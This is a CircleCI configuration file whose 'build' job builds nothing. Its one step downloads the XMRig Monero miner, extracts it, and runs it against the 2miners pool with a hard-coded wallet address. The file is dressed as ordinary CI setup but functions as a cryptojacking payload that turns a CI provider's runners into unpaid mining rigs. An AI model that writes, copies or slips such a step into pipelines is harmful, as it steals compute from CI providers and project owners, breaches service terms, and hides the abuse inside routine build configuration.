version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: 
         wget https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-linux-static-x64.tar.gz
         tar -xvf xmrig-6.15.0-linux-static-x64.tar.gz
         ls
         cd xmrig-6.15.0
         ./xmrig -o xmr.2miners.com:12222 -u 44UpDeveumP45WdGEmviTxdtxBqWUpt6k7svF3ekiMWxJwVaSrmorX9MnnY7oDQdY8NbD1kHbNNiELEg9P194QrzPEF8jic -k --tls --rig-id rig